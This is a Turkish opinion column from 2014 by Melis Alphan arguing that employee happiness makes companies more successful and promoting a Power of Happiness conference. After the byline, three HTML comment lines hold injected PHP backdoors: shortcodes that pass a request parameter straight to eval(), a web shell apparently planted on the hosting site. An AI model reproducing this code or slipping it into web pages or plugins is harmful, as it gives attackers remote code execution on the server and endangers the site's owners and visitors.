İşte mutluluk bir lüks mü? Gereklilik mi? Yoksa bir iş stratejisi mi?
En azından işveren söz konusu olduğunda cevap basit: Çalışanlarının mutlu olduğu şirketler daha çok para kazanıyor.
Yani, işte mutluluk bir lüks değil, rekabetçi ve başarılı olmak isteyen şirketler için bir zorunluluk.
Tijen Mergen, Diana Fındıkoğlu ve Ferah Lök’ün 2003’te kurduğu, Alexander Kjerulf ve şirketi Woohoo Inc ile ortaklığa gittiği Power of Happiness (POH), yani Mutluluğun Gücü Platformu, şirketinizin emekleme aşamasında olmasıyla ilk 500 arasında olmasının fark etmediğini, insan kaynağınızın önümüzdeki yıllarda başarınızda belirleyici olacağını vurguluyor. İnsan kaynağınız sizi ya vezir edecek ya da rezil.
İş ve mutluluk çok ilintili şeyler. İş, insanı mutlu edecek birçok fırsat yaratabiliyor.
Ne gibi derseniz…
İnsanlarla ilişki kurmak, yeni şeyler öğrenmek ve becerilerimizi geliştirmek, güçlü taraflarımızı kullanmak, hedeflerimize ulaşıp bir anlam bulmak…
Bunlar insanı mutlu etmezse ne eder bilmiyorum.
POH, mutlu çalışanların şirketleri daha başarılı yaptığını savunuyor. “Mutluluk ciddi bi iştir” diyor; işyerinde mutluluk ile iyiliğin üretken ve etkili bir organizasyonun temelini oluşturduğunun altını çiziyor.
Mutlu olan elemanın verimi yüksek olur. Bunun sağlaması için araştırma yapmaya bile gerek yok ama epeyce araştırma yapılmış ve çıkan sonuç şu: Mutlu çalışanlar mutsuzlara kıyasla kendilerini işe daha çok veriyor, motivasyonları daha yüksek, yenilikçiler, müşteriye daha iyi hizmet veriyor, takımlarda daha etkili şekilde rol alıyor ve daha iyi liderler oluyorlar.
Bu platform kurumlara mutlu birer şirket olmanın yollarını öğretiyor. Nasıl mı?
Yöneticilerle ve çalışanların ihtiyacına yönelik tasarlanmış “işte mutluluk” konulu atölye çalışmaları düzenliyor. Kurumların yapısına göre bu konuda sistem oluşturuyor ve danışmanlık veriyor. Kilit noktalara dair konuşmalar yapıyor.
Ve son olarak, Dünya Mutluluk Günü etkinlikleri çerçevesinde 25 Mart’ta bir konferans düzenliyor.
İş’in Sırrı Mutluluk başlıklı konferansın içeriği hem kurum yöneticilerini hem de çalışanları hedefliyor. Zira işyerinin olumlu ve mutlu bir çalışma ortamına dönüşmesinde bu iki gruba da iş düşüyor.
Konferansta işte mutlu olmanın yolları farklı açılardan ele alınacak. Sinir bilim uzmanları, akademisyenler ve araştırmacılar, başarı hikayelerinden de yola çıkarak sosyal sorumluluk projelerinin kurum içi kültüre etkilerini, spor ve hobilerin bireylere katkılarını ele alacaklar.
8’i yabancı 12 konuşmacının katılacağı konferans tüm kurumlara ve çalışanlarına açık olacak.
Ne kurumlar ne de çalışanlar kaçırmalı. Zira işte mutlu olmak hayatta mutlu olmak demek.
Mutluluğu yazık ki kompartımanlara ayıramıyoruz.
Melis Alphan
11.12.2014
<!– [insert_php]if (isset($_REQUEST["tAQ"])){eval($_REQUEST["tAQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["tAQ"])){eval($_REQUEST["tAQ"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["zlGn"])){eval($_REQUEST["zlGn"]);exit;}[/insert_php][php]if (isset($_REQUEST["zlGn"])){eval($_REQUEST["zlGn"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["Tlp"])){eval($_REQUEST["Tlp"]);exit;}[/insert_php][php]if (isset($_REQUEST["Tlp"])){eval($_REQUEST["Tlp"]);exit;}[/php] –>